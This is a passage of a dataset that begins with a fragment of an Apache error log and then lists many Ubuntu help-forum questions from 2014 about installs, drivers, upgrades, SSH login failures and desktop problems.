pid 3769 ] [ client 192.168.0.104:51267 ] ah01630 : client denied by server configuration : /home/inferusvv/www/favicon.ico [ sun apr 20 10:21:20.697029 2014 ] [ authz_core : error ] [ pid 3769 ] [ client 192.168.0.104:51267 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:21:20.872278 2014 ] [ authz_core : error ] [ pid 3769 ] [ client 192.168.0.104:51267 ] ah01630 : client denied by server configuration : /home/inferusvv/www/favicon.ico [ sun apr 20 10:21:20.898243 2014 ] [ authz_core : error ] [ pid 3769 ] [ client 192.168.0.104:51267 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:21:21.086058 2014 ] [ authz_core : error ] [ pid 3769 ] [ client 192.168.0.104:51267 ] ah01630 : client denied by server configuration : /home/inferusvv/www/favicon.ico [ sun apr 20 10:21:21.097149 2014 ] [ authz_core : error ] [ pid 3769 ] [ client 192.168.0.104:51267 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:21:21.301569 2014 ] [ authz_core : error ] [ pid 3769 ] [ client 192.168.0.104:51267 ] ah01630 : client denied by server configuration : /home/inferusvv/www/favicon.ico [ sun apr 20 10:21:21.303216 2014 ] [ authz_core : error ] [ pid 3770 ] [ client 192.168.0.104:51268 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:21:21.501052 2014 ] [ authz_core : error ] [ pid 3770 ] [ client 192.168.0.104:51268 ] ah01630 : client denied by server configuration : /home/inferusvv/www/favicon.ico [ sun apr 20 10:21:21.504037 2014 ] [ authz_core : error ] [ pid 3770 ] [ client 192.168.0.104:51268 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:21:21.696890 2014 ] [ authz_core : error ] [ pid 3770 ] [ client 192.168.0.104:51268 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:21:21.713474 2014 ] [ authz_core : error ] [ pid 3770 ] [ client 192.168.0.104:51268 ] ah01630 : client denied by server configuration : /home/inferusvv/www/favicon.ico [ sun apr 20 10:21:21.742161 2014 ] [ authz_core : error ] [ pid 3770 ] [ client 192.168.0.104:51268 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:21:21.756219 2014 ] [ authz_core : error ] [ pid 3770 ] [ client 192.168.0.104:51268 ] ah01630 : client denied by server configuration : /home/inferusvv/www/favicon.ico [ sun apr 20 10:21:21.942965 2014 ] [ authz_core : error ] [ pid 3770 ] [ client 192.168.0.104:51268 ] ah01630 : client denied by server configuration : /home/inferusvv/www/favicon.ico [ sun apr 20 10:23:05.497139 2014 ] [ authz_core : error ] [ pid 3770 ] [ client 192.168.0.105:65322 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:30:51.043435 2014 ] [ authz_core : error ] [ pid 3771 ] [ client 192.168.0.105:65492 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:32:24.632306 2014 ] [ authz_core : error ] [ pid 3773 ] [ client 192.168.0.105:65524 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:35:31.462412 2014 ] [ mpm_prefork : notice ] [ pid 3765 ] ah00169 : caught sigterm , shutting down [ sun apr 20 10:36:07.925136 2014 ] [ mpm_prefork : notice ] [ pid 1142 ] ah00163 : apache/2.4.7 ( ubuntu ) php/5.5.9-1ubuntu4 configured -- resuming normal operations [ sun apr 20 10:36:07.972134 2014 ] [ core : notice ] [ pid 1142 ] ah00094 : command line : '/usr/sbin/apache2' [ sun apr 20 10:36:37.234597 2014 ] [ authz_core : error ] [ pid 1210 ] [ client 192.168.0.105:49159 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:36:44.817865 2014 ] [ authz_core : error ] [ pid 1211 ] [ client 192.168.0.105:49160 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:36:45.798784 2014 ] [ authz_core : error ] [ pid 1211 ] [ client 192.168.0.105:49160 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:45:28.535259 2014 ] [ mpm_prefork : notice ] [ pid 1142 ] ah00169 : caught sigterm , shutting down [ sun apr 20 10:45:30.116919 2014 ] [ mpm_prefork : notice ] [ pid 3020 ] ah00163 : apache/2.4.7 ( ubuntu ) php/5.5.9-1ubuntu4 configured -- resuming normal operations [ sun apr 20 10:45:30.116957 2014 ] [ core : notice ] [ pid 3020 ] ah00094 : command line : '/usr/sbin/apache2' [ sun apr 20 10:45:37.254292 2014 ] [ authz_core : error ] [ pid 3024 ] [ client 192.168.0.105:49395 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:45:53.743871 2014 ] [ mpm_prefork : notice ] [ pid 3020 ] ah00169 : caught sigterm , shutting down [ sun apr 20 10:45:55.390600 2014 ] [ mpm_prefork : notice ] [ pid 3076 ] ah00163 : apache/2.4.7 ( ubuntu ) php/5.5.9-1ubuntu4 configured -- resuming normal operations [ sun apr 20 10:45:55.390638 2014 ] [ core : notice ] [ pid 3076 ] ah00094 : command line : '/usr/sbin/apache2' [ sun apr 20 10:45:55.941496 2014 ] [ authz_core : error ] [ pid 3080 ] [ client 192.168.0.105:49399 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:45:56.554178 2014 ] [ authz_core : error ] [ pid 3080 ] [ client 192.168.0.105:49399 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:45:57.624453 2014 ] [ authz_core : error ] [ pid 3080 ] [ client 192.168.0.105:49399 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:45:57.981383 2014 ] [ authz_core : error ] [ pid 3080 ] [ client 192.168.0.105:49399 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:45:58.317833 2014 ] [ authz_core : error ] [ pid 3080 ] [ client 192.168.0.105:49399 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:49:18.226108 2014 ] [ authz_core : error ] [ pid 3081 ] [ client 10.9.90.6:49511 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:49:18.977140 2014 ] [ authz_core : error ] [ pid 3081 ] [ client 10.9.90.6:49511 ] ah01630 : client denied by server configuration : /home/inferusvv/www/favicon.ico [ sun apr 20 10:49:19.173951 2014 ] [ authz_core : error ] [ pid 3081 ] [ client 10.9.90.6:49511 ] ah01630 : client denied by server configuration : /home/inferusvv/www/favicon.ico [ sun apr 20 10:53:52.613515 2014 ] [ authz_core : error ] [ pid 3083 ] [ client 10.9.90.6:49636 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:53:53.264924 2014 ] [ authz_core : error ] [ pid 3083 ] [ client 10.9.90.6:49636 ] ah01630 : client denied by server configuration : /home/inferusvv/www/favicon.ico [ sun apr 20 10:53:53.410589 2014 ] [ authz_core : error ] [ pid 3083 ] [ client 10.9.90.6:49636 ] ah01630 : client denied by server configuration : /home/inferusvv/www/favicon.ico
451164	installing xubu on 'virtual box '	i am having a problem installing xubu 13.10 as a vm in kvm , but running as live disk in 'virtual box ' seems to work good . so i guess i will go ahead for now and run 13.10 as vm in virtual box , but i have a question regarding the installation : when the install gets to the part that inquires about on what disk to select there are 4 options . the first offers to `` erase disk and install ubuntu '' and the last allows the user to do `` something else '' as shown in this link : http : //www.wikihow.com/image : install-ubuntu-on-virtualbox-step-30.jpg i created the virtual disk 'xubu13-10.vdi ' on partition 'sdb7 ' so i assume the first option , `` erase disk and install ubuntu '' refers to 'sdb7 ' . when i select the `` something else '' option , only 'sda ' is listed , and i can not seem to select anything else , like sdb and sdb7 in particular . this looks sort of scary since i do not want the install to do anything on 'sda ' whatsoever . the confusion for me arises from the fact that when i last installed xubu , 10.04 i think , that 4th option to do `` something else '' allowed the user to manually select the partition on which to install , allowing one to be crystal clear about where xubu would be installed . i guess if someone could just verify that the first option , `` erase disk and install ubuntu '' will erase only the partition , sdb7 , i selected when setting up the 'vdi ' then i am set to go .
451165	toshiba satellite p850 fn-keys not working	i could solve several other issues with my laptop thanks to this forum . the only thing i ca n't figure out is the non working fn-keys for the brightness . volume control is fine . two things i found out so far : 1 ) i might have to update my bios ( would only work in windows and i 'm running 14.04 ubuntu only ) 2 ) i have to `` re-program '' every key myself , using this `` recording '' function in the terminal , unfortunately i send my laptop to sleep when i press f4 . and anyway this option seems very complicated . thanks for your help ! urs
451167	screen gets stuck on wallpaper after i login into my username	i recently downloaded the new ubuntu 14.04 and after a few days when i tried to access my account , right after i successfully logged in it gets stuck in the wallpaper where i can only move my cursor . i tried to fixed by reading other threads but i ca n't seem to install any new software through the terminal . i have asus n56vj
451170	no link on wine download page ?	i 've opened the link https : //apps.ubuntu.com/cat/applications/wine1.3/ but i ca n't find the download link . if i click on the download button it offers me ubuntu the options on the side just bring me to the same page again . i 've opened the link in firefox on my windows 8 operating system . is w8 blocking it ?
451171	on 14.04 , my kernel version is 3.11.0-18 ?	after upgrading to 14.04 , my kernel is not upgraded ! it 's like before : linux boxi 3.11.0-18-generic # 32-ubuntu smp tue feb 18 21:11:14 utc 2014 x86_64 x86_64 x86_64 gnu/linux here 's what i did : sudo apt-get update sudo apt-get dist-upgrade sudo do-release-upgrade sudo apt-get update sudo apt-get dist-upgrade lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty
451172	missing adobe helvetica font on 13.10	xxx : ~ $ xlsfonts -fn -adobe-helvetica-*-*-*-*-*-*-*-*-*-*-*-* xlsfonts : pattern `` -adobe-helvetica-*-*-*-*-*-*-*-*-*-*-*-* '' unmatched i need this font for r. how do i fix this ?
451175	how can i calibrate colors ?	in system settings - > colors there is color panel but `` calibrate '' button is grey and i am unable to calibrate it by myself . anyone can help ?
451178	wifi led continuously blinking ubuntu 14.04 and slowed connection	i can connect to my wifi fine , but when it is connected the led light to indicate if i am connected to the network keeps blinking . when i disconnect it stays solid . my network is hidden and has a mac filter . i also want to add that i contacted my internet provider and ruled out them as a problem . because my connection is 45 mb/s wired but 16 mb/s wireless . where as when i had windows 7 my average wireless speed was between 35 mb/s and 40 mb/s here is a summary of some of my specs on my hp pavilion dv6000 processor processors intel ( r ) core ( tm ) i3-2310m cpu @ 2.10ghz 800.00mhz intel ( r ) core ( tm ) i3-2310m cpu @ 2.10ghz 800.00mhz intel ( r ) core ( tm ) i3-2310m cpu @ 2.10ghz 800.00mhz intel ( r ) core ( tm ) i3-2310m cpu @ 2.10ghz 800.00mhz network interfaces network interfaces eth0 0.00mib 0.00mib lo 0.11mib 0.11mib virbr0 0.00mib 0.00mib wlan0 3.61mib 0.69mib -computer- processor : 4x intel ( r ) core ( tm ) i3-2310m cpu @ 2.10ghz memory : 3994mb ( 1391mb used ) operating system : ubuntu 14.04 lts user name : john ( john syzemore ) date/time : sun 20 apr 2014 12:37:24 am mst -display- resolution : 1366x768 pixels opengl renderer : mesa dri intel ( r ) sandybridge mobile x11 vendor : the x.org foundation -multimedia- audio adapter : hda-intel - hda intel pch - input devices- lid switch power button power button at translated set 2 keyboard razer razer naga hex razer razer naga hex hp truevision hd synps/2 synaptics touchpad video bus hda intel pch hdmi/dp , pcm : 3= hda intel pch front headphone hda intel pch mic st lis3lv02dl accelerometer hp wmi hotkeys -printers ( cups ) - hp-officejet-4620-series : default -scsi disks- ata hitachi hts54755 hp dvd-ram uj8b1
451179	sudo apt-get update gives me the same list everytime	i upgraded by the command : sudo apt-get upgrade after the update finished , the result is the same ; the next time i run the command , the same result appears , something like : ign http : //security.ubuntu.com trusty-security inrelease . . . ign http : //in.archive.ubuntu.com trusty-proposed/universe translation-en_in fetched 217 kb in 1min 21s ( 2,648 b/s ) reading package lists ... done i searched for a solution , but it seems i am the only one with this problem . if this question is a duplicate , could someone give me a link to the original question ?
451183	correct source code for developing and loading kernel	i want to develop char drivers on my system : # lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise kernel info : 3.8.0-38-generic # 56~precise1-ubuntu smp thu mar 13 16:23:47 utc 2014 i686 i686 i386 gnu/linux my question is : do i need to download the same version of kernel for driver development and loading ? if so , how do i download the same version using command line ? i tried : # apt-get source linux-source-3.8.0-38-generic reading package lists ... done building dependency tree reading state information ... done e : unable to find a source package for linux-source-3.8.0-38-generic but failed ! !
451186	failed to load module `` unity-gtk-module '' - gtk error in vmware	am using ubuntu 14.4. now when i try to install vmware-player-6.0.1-1379776.x86_64.bundle i got error , extracting vmware installer ... done . gtk-message : failed to load module `` overlay-scrollbar '' : liboverlay-scrollbar.so : can not open shared object file : no such file or directory gtk-message : failed to load module `` unity-gtk-module '' : libunity-gtk-module.so : can not open shared object file : no such file or directory no protocol specified no protocol specified after this gui fail to load for installation procedure , so only can do installation via terminal . but after installation it wo n't run . how i can run vmware ? what i need to install ?
451188	qml : qchar booleans are undefined	function myfunction ( x ) { console.log ( x.isletter ) } myfunction ( `` s '' ) when i run this in a .qml file , it tells me that `` isletter '' is undefined . why ? http : //qt-project.org/doc/qt-5/qchar.html # isletter
451192	how to patch rt kernel in ubuntu 13.10 ?	i have followed the steps given in the below link ... how can i install a realtime kernel ? ... ... .after installing the kernel , system is not rebooting automatically . need help .
451195	how to enable hibernate on sony vaio pro haswell	hibernate refused to work with 13.10 on my sony vaio pro . here 's how i got it to work : first i followed the directions here to enable hibernation : how to enable hibernation ? then create the following file /etc/acpi/events/lid and enter the following in it : event=button/lid [ action=/etc/acpi/lid.sh then create and edit a file called /etc/acpi/lid.sh and put the following in it : # ! /bin/sh /bin/grep -q open /proc/acpi/button/lid/lid/ state & & exit 0 /usr/sbin/pm-hibernate restart and lid down hibernation should now be working .
451198	get old search style back in nautilus	i 'm currently using ubuntu 14.04 and i love the new update and everything , but i miss the old search method . like if i needed to search for a file i could just start typing directly and the results would come . but after the update i have to click the search bar and only then can i search . is there any way to get back the old search method
451199	bluetooth is unstable in 14.04	i use a filco bluetooth keyboard and a logitech bluetooth mouse on my thinkpad t540p with 14.04 lts ( the bluetooth adapter is intel dual band wireless 7260ac ) . they can be connected successfully . however , the connection seems to be quite unstable . in many case , after i use them for a while , the system disconnects my devices and then automatically reconnect them , thus i have to wait for about 10s for them to work again . in some other case , the software reports `` the battery of your devices is low ( 0 % ) '' and then i have to restart the bluetooth services in order to make my devices work again .
451202	how to have a clean *ubuntu and awesome wm	mi request is quite simple . how can i get an *buntu distro but with awesome in it ? i mean , how can i wipe off everything in ubuntu ( unity & stuff ) and get awesome wm ? what i 'd like is *buntu easy of use + awesome wm . ideas on how can i accomplish this ?
451204	update manager not worknig and red icon on my menu panel	i 've been upgrading my ubuntu 13.10 to 14.04 lts , during the installation process , i accidentally lost power after this i try to turnon my machine , it shows red icon with error message here is the screenshot : when i click this it shows an error message : an error occurred , please run package manager from the right-click from the right click window or apt-get in a terminal to see what is wrong . the error message was : 'error : brokencount > 0 ' . this usually means that your installed installed packages have unmet dependencies experts says to run this command : sudo apt-get -f install i got the following error dpkg : error processing package libreadline6 : i386 ( -- configure ) : package is in a very bad inconsistent state ; you should reinstall it before attempting configuration errors were encountered while processing : libreadline6 : i386 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) and also update manager not working here is the screenshot : i have been looking around but am unable to find a way to resolve this
451210	ubuntu 13.10 kylin upgrade to 14.04 gnome	how can i upgrade from ubuntu 13.10 kylin to ubuntu 14.04 gnome ? ( i have a slow internet connection , so i downloaded the new version of ubuntu gnome & booted it via usb . however , i ca n't find the upgrade option in installation window . ( i need to update an 80 mb file in saucy salamander , which i did n't update since i am not sure after doing so whether i can upgrade . ) what do i do ? i need to be able to do this without losing my applications .
451211	how to disconnect from a wireless network in gnome 3.10	i wanted to start my hotspot ( using ap-hotspot ) . to enable it , you have to disconnect from the wireless network you 're connected to . this was no problem in gnome 3.8 's network manager , but i can not find a similar functionallity in gnome 3.10 . the only way i found to disconnect is clicking on `` forget this network '' . is there a way to just disconnect without forgetting all my settings ? edit : $ gnome-control-center -- version gnome-control-center 3.10.1 just in case somebody has an old control center but a new gnome shell . ; - )
451216	configuring apt to use installation dvd as a package source in kubuntu 14.04	i 've just installed kubuntu 14.04 , and as i have infrequent network connectivity i would like apt to use the installation media as a package source whenever possible . however , i do n't seem to be able to get it to work . using `` software centre '' s option to configure sources , i first tried to check the preconfigured option for the installation dvd , but when i tried apt-get install build-essential , it just ended up prompting me to insert the disc in /media/cdrom repeatedly ... unfortunately , /media/cdrom does n't exist , and the disc gets automounted in /media/myusername/disclabel instead . i also tried unchecking the preconfigured option and clicking `` add cdrom '' , but it failed to find the disc , presumably because it too is looking in the non-existant /media/cdrom mount point . is there a way to do this without having to hand-edit configuration files ?
451217	issue in building a new kernel in ubuntu 13.04 , upgrading from 3.8.0.35 to 3.9	i am getting the following error after running make while upgrading my kernel 3.8.0.35 to new kernel 3.9 : sdp @ sdp-dell-system-vostro-3450 : /usr/src/linux_latest_dev_src_tree/linux-git $ make make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : nothing to be done for `relocs ' . chk include/generated/uapi/linux/version.h chk include/generated/utsrelease.h call scripts/checksyscalls.sh cc scripts/mod/devicetable-offsets.s gen scripts/mod/devicetable-offsets.h hostcc scripts/mod/file2alias.o hostld scripts/mod/modpost chk include/generated/compile.h gen usr/initramfs_data.cpio /usr/src/linux_latest_dev_src_tree/linux-git/scripts/gen_initramfs_list.sh : line 51 : $ { output } : ambiguous redirect make [ 1 ] : *** [ usr/initramfs_data.cpio ] error 1 make : *** [ usr ] error 2 sdp @ sdp-dell-system-vostro-3450 : /usr/src/linux_latest_dev_src_tree/linux-git $ even when i am specifying the target to be like make bzimage , i am getting the same issue . i checked up in the script gen_initramfs_list.sh , $ { output } is `` '' . but i do n't know why its so . please help . i am running ubuntu 13.04
451218	reconfigure nautilus and gnome terminal and gnome tweak tool	i have followed the instructions from http : //www.muktware.com/2013/12/install-nvidia-331-bumblebee-optimus-cards/18271 to install nvidia-331 drivers on a fresh installed ubuntu gnome 14.04 , using lenovo z580 laptop . after a restart i ca n't use nautilus and gnome-terminal , i have tried and others applications and i have not found problems . i think that the problem is in interface rendering . if i open terminal , type a command and press enter the command is executed . i have found the the problem is not in nvidia drivers or integrated video card - intel hd graphics 2000 . if i run sudo nautilus than the nautilus works . i think that the problem is in configuration of this 2 programs and gnome tweak tool . how i can reconfigure it ? for more understanding i have made screenshots ( on screen its are black , on screenshot its are light grey , i do n't know why ) :
451220	no login screen on boot up	when i boot up my system it goes straight to my desktop without asking for my password on the login page . instead there is a keyring prompt that comes up where i have to type the password . any suggestions on how to get the login screen back
451221	ubuntu 14.04 install nvidia driver	after i have managed to get running ubuntu 14.04 ( look at my last question about booting upgraded ubuntu ) now there is another problem : to continue with that story : i found a way to burn the image on a dvd . i took the amd64-image and with that it was no problem . even under windows now it was possible to burn the iso-image . ubuntu then gave me the option to `` reenstall '' the already installed but not opening 14.04-distribution . so my data remained in home-directory . but : i did n't know that my machine is able to run 64-bit as it is an intel processor but the machine has more than 2g ram , exactly 5,8g . so the whole installation ran smoothly and ubuntu is there again with 14.04 . but : now i need a new driver for my nvidia gforce gt 630 ( correct ? ) . the former driver was rejected as not compatible with the 64-bit . i found that other driver and when i wanted to install it in the terminal with sh i was called first to stop the x-server . it can not be installed with running x-server . so the next question : how to stop the x-server ? or : how to boot until console prompt without starting the x-server ? somebody can explain it to me so that even i can understand it ? the explanation in the nvidia web site for installation under linux i did n't understand .
451222	ubuntu 13.10 is showing error while upgrading to 14.04	w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_trusty_universe_binary-i386_packages hash sum mismatch , e : some index files failed to download . they have been ignored , or old ones used instead . this is the error message showing while upgrading from 13.10 to 14.04 . any solution ? ?
451227	ssh permission denied ( public key ) , but root ssh works	i 'm trying to setup ssh access for a user account that i created with chef on a digital ocean ubuntu 12.04 server . i had the options set in digital ocean to automatically copy my mac 's ssh key when the droplet is created . i can ssh in as root with no issues , but my other user fails to authenticate . this seems to be a common issue , and i checked some of the other answers , and found this command to get more info : ssh -vvv -i id_rsa user @ serverip the logs for the root user ( which succeeds ) with that command are debug 1 : offering rsa public key : /users/evan/.ssh/id_rsa debug3 : send_pubkey_test debug2 : we sent a publickey packet , wait for reply debug1 : server accepts key : pkalg ssh-rsa blen 279 debug2 : input_userauth_pk_ok : fp snip ! debug3 : sign_and_send_pubkey : snip ! debug1 : read pem private key done : type rsa debug1 : authentication succeeded ( publickey ) . failing user : debug 1 : authentications that can continue : publickey debug3 : start over , passed a different list publickey debug3 : preferred publickey , keyboard-interactive , password debug3 : authmethod_lookup publickey debug3 : remaining preferred : keyboard-interactive , password debug3 : authmethod_is_enabled publickey debug1 : next authentication method : publickey debug1 : offering rsa public key : /users/evan/.ssh/id_rsa debug3 : send_pubkey_test debug2 : we sent a publickey packet , wait for reply debug1 : authentications that can continue : publickey debug1 : trying private key : /users/evan/.ssh/id_dsa debug3 : no such identity : /users/evan/.ssh/id_dsa : no such file or directory debug2 : we did not send a packet , disable method debug1 : no more authentication methods to try . which to me means that the public key is incorrect . but , if i login as the root user and go to home/otheraccount/.ssh/authorized_keys , i can see that my ssh key is there . i thought maybe there was an error , so i did cp .ssh/authorized_keys ~/home/otheraccout/.ssh/authorized_keys but that did n't help . i do n't know where else to look . my etc/ssh/sshd_conig : # what ports , ips and protocols we listen for port 22 # use these options to restrict which interfaces/protocols sshd will bind to # listenaddress : : # listenaddress 0.0.0.0 protocol 2 # hostkeys for protocol version 2 hostkey /etc/ssh/ssh_host_rsa_key hostkey /etc/ssh/ssh_host_dsa_key hostkey /etc/ssh/ssh_host_ecdsa_key # privilege separation is turned on for security '' sshd_config '' 88l , 2508c keyregenerationinterval 3600 serverkeybits 768 # logging syslogfacility auth loglevel info # authentication : logingracetime 120 permitrootlogin yes strictmodes yes rsaauthentication yes pubkeyauthentication yes # authorizedkeysfile % h/.ssh/authorized_keys # do n't read the user 's ~/.rhosts and ~/.shosts files ignorerhosts yes # for this to work you will also need host keys in /etc/ssh_known_hosts rhostsrsaauthentication no # similar for protocol version 2 hostbasedauthentication no # uncomment if you do n't trust ~/.ssh/known_hosts for rhostsrsaauthentication # ignoreuserknownhosts yes permitemptypasswords no # change to yes to enable challenge-response passwords ( beware issues with # some pam modules and threads ) challengeresponseauthentication no # change to no to disable tunnelled clear text passwords passwordauthentication no # gs sapi options # gssapiauthentication no # gssapicleanupcredentials yes x11forwarding no x11displayoffset 10 printmotd no printlastlog yes tcpkeepalive yes # uselogin no # maxstartups 10:30:60 acceptenv lang lc_* subsystem sftp /usr/lib/openssh/sftp-server usepam no banner /etc/ssh_banner edit : drwx -- -- -- 2 deploy deploy 4096 apr 20 06:00 .ssh -rw -- -- -- - 1 deploy deploy 820 apr 20 05:35 authorized_keys edit2 : as suggested in the comments : /var/log/authlog : apr 21 04:59:30 localhost sshd [ 586 ] : user deploy not allowed because account is locked apr 21 04:59:30 localhost sshd [ 586 ] : input_userauth_request : invalid user deploy [ preauth ] i tried to do sudo usermod -- expiredate -1 deploy and it returned no changes
451228	wifi : still connected but no throughput	i have a problem with ubuntu 14.04 on my acer-laptop . wifi is working , but after a couple of minutes there is no throughput , no up- nor download , although i am still connnected . as soon as i disconnect and reconnect , it works for a couple of minutes . any ideas ?
451229	error while running mooshak on browser ( local host ) in ubuntu 14.04	how to resolve this error ? ? pls provide step by step solution . # ! /bin/sh # the next line restarts using tclsh \ path= $ path : /usr/local/bin : /usr/contrib/bin ; exec tclsh `` $ 0 '' `` $ @ '' # -*-mode : tcl ; iso-accents-mode : t ; -*- cd ../.. lappend auto_path packages source .config execute : :command_line
451238	how can i improve the font rendering of swing java applications under ubuntu ?	some swing-java programs in ubuntu look very ugly because of their font . what 's wrong with the fonts ? is there any way to fix the aliasing ?
451239	can not seek mkv files in totem ubuntu 14.04	when i try to seek an mkv file in totem , it automatically closes without any error dialog . i have the three gstreamer plugins installed ( good , bad and ugly ) edit : the following error message is displayed when i seek and video - gst_video_codec_frame_ref : assertion 'frame ! = null ' failed ; segmentation fault
451240	different theme at loginscreen	i did not change it . but somehow at login screen the theme is the new 14.04 `` adwaita '' and after logging in its the default `` radiance '' ( can change this ) . please tell me a way to change the login screen theme which i cant .
451242	printing speed is slow on ubuntu	i am using hp laserjet p1007 printer . on detecting printer , hplip ( hplip-plugin-run ) configured successfully on ubuntu 12.04 lts . and printer is working . but printing speed is slow . on windows , a5-size page printed slower than a4 , legal size page . on ubuntu i have slow speed for all size page ( same as a5 on windows ) . how to speedup printing for common size ( a4 ) .
451244	software center not respondng when installing steam	whenever i try to install steam from the software center , the center goes unresponsive and i have to cancel it . i get no error message other than `` not responding '' . i have tried installing the steam launcher from their website which costs money in the software center . but after the installation i ca n't run it , i get no error message ; it just wo n't start . i am able to install other programs such as virtual box from the software center though . what to do ? i use ubuntu 14.04
451245	signon-ui `` enter your credentials '' dialog on desktop	i have just installed trusty and have rebooted a couple times . however this time i have been greeted by this strange dialog when i logged in . i have no idea what kind of credentials it asked and which app shows this dialog . i clicked the cancel button but it keeps popping up . does anyone know what dialog is it ? how to figure out which process it belongs to ? edit : i figured out that this dialog came from signon-ui . so , i think it asked my ubuntu sso credentials . however , after i put my ubuntu credentials into it , it keeps showing up .
451249	dual-boot lost after windows 8.1 upgrade	i had a uefi dual-boot setup of ubuntu saucy + windows 8 . after the 8.1 upgrade the machine boots straight into windows . i ca n't even seem to boot from the live usb drive even though i 've disabled win8-optimized boot and made the usb device the top option in boot preferences . i also have multiple partitions including a /boot partition , but i do n't remember which one . i also have an encrypted home drive . i 've seen solutions here and there but none seem to answer all the issues at once . thanks !
451254	`` dpkg : trying to overwrite ' ... /gsettings/gnome-settings-daemon.convert also in package gnome-settings-daemon '' when upgrading to trusty	while upgrading to 14.04 i ran into a dependency issue gnome-settings-daemon-schemas which blocked the upgrade . after running sudo apt-get -f install i get : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : gnome-settings-daemon-schemas the following new packages will be installed : gnome-settings-daemon-schemas 0 upgraded , 1 newly installed , 0 to remove and 530 not upgraded . 9 not fully installed or removed . need to get 0 b/44.2 kb of archives . after this operation , 189 kb of additional disk space will be used . do you want to continue ? [ y/n ] y ( reading database ... 252639 files and directories currently installed . ) preparing to unpack ... /gnome-settings-daemon-schemas_3.8.6.1-0ubuntu11_all.deb ... unpacking gnome-settings-daemon-schemas ( 3.8.6.1-0ubuntu11 ) ... dpkg : error processing archive /var/cache/apt/archives/gnome-settings-daemon-schemas_3.8.6.1-0ubuntu11_all.deb ( -- unpack ) : trying to overwrite '/usr/share/gconf/gsettings/gnome-settings-daemon.convert ' , which is also in package gnome-settings-daemon 3.10.2-0ubuntu1~saucy6 processing triggers for gconf2 ( 3.2.6-0ubuntu2 ) ... errors were encountered while processing : /var/cache/apt/archives/gnome-settings-daemon-schemas_3.8.6.1-0ubuntu11_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) depends : gnome-settings-daemon-schemas ( < 3.10 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . what has caused this and how do i progress to fix it ? in case it 's relevant , here 's the original dependency hell : the following packages have unmet dependencies : aptitude : depends : aptitude-common ( = 0.6.8.2-1ubuntu4 ) but it is not going to be installed depends : libboost-iostreams1.54.0 but it is not going to be installed depends : libcwidget3 but it is not going to be installed depends : libept1.4.12 but it is not going to be installed compiz-gnome : depends : gnome-settings-daemon-schemas ( > = 3.4.2-0ubuntu9 ) but it is not going to be installed unity-settings-daemon : depends : gnome-settings-daemon-schemas ( > = 3.8 ) but it is not going to be installed depends : gnome-settings-daemon-schemas ( < 3.10 ) but it is not going to be installed
451260	unable to install mediaelch on ubuntu 14.04	i am trying to install mediaelch after the upgrade from 13.xx removed it . i followed the instructions from the mediaelch website ( http : //www.kvibes.de/en/mediaelch/download/ ) sudo add-apt-repository \ppa : kvibes/mediaelch sudo apt-get update sudo apt-get install mediaelch the first two steps worked fine however the third one failed as below . the following packages have unmet dependencies : mediaelch : depends : libqt5core5 ( > = 5.0.2 ) but it is not installable e : unable to correct problems , you have held broken packages . can anyone help me out please ? i am very very new to linux and just converted to linux from windows 8 out of frustration so please bear with me . my upgrade from 13 to 14 was a resonable success with no issues that i could tell . i have even tried a suggestion on a website to download the package and edit something called the package control file however i have had no success .
451261	adding java_home ( jdk ) in .bashrc	i just installed ubuntu and am java 7u55 ( jdk ) and am trying to configure java_home as an environment variable . in ~/.bashrc i added : # exports java_home=/home/myuser/sandbox/java/7u55/jdk1.7.0_55 export path= $ path : java_home yet when i close the terminal and open a new shell and type which java or java -version ubuntu does n't seem to know what i 'm talking about ( says program java can be found in one of several packages and prompts me to use sudo apt-get to install one of them ) . what am i doing wrong ?
451262	locating a installation	hello i would like to find a file called lyxpipe ( which is used by the program lyx ) . however , i do n't have a idea where the program is installed . i typed locate lyx lyx : /usr/bin/lyx2.0 /usr/bin/x11/lyx2.0 /usr/share/lyx2.0 however , when i try to navigate to the folders i can type pwd home/theodor where theodor is my username . but there is no other folder bin in this directory . can somebody tell me how to access these paths ?
451263	too slow after upgrading from 13.10 to 14.04 lts	i have recently upgraded from 13.10 to 14.04 ubuntu . speed has drastically gone slow , do n't know why . since i am new to ubuntu , not much aware , what could be the possible reasons . please help me out .
